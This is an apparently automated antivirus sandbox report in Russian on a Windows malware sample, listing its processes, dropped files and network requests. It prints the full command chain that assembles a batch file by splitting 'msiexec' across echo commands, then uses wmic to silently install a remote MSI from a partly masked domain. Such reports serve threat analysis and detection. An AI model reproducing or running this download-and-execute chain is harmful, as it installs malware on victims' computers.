Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\ZGBdc.bat&echo|set /p="iexec /i http://gb##sic.me/backup.msi /q'" >> %temp%\ZGBdc.bat&%temp%\ZGBdc.bat>%temp%\ZGBdc.txt
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\zgbdc.bat
- %TEMP%\zgbdc.txt
Сетевая активность
TCP
Запросы HTTP GET
- http://gb##sic.me/backup.msi
- http://gb##sic.me/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK gb##sic.me
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\ZGBdc.bat&echo|set /p="iexec /i http://gb##sic.me/backup.msi /q'" >> %temp%\ZGBdc.bat&%temp%\ZGBdc.bat>%temp%\ZGBdc.txt' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'ms" 1>%TEMP%\ZGBdc.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="iexec /i http://gb##sic.me/backup.msi /q'" 1>>%TEMP%\ZGBdc.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i http://gb##sic.me/backup.msi /q'
- '<SYSTEM32>\msiexec.exe' /i http://gb##sic.me/backup.msi /q
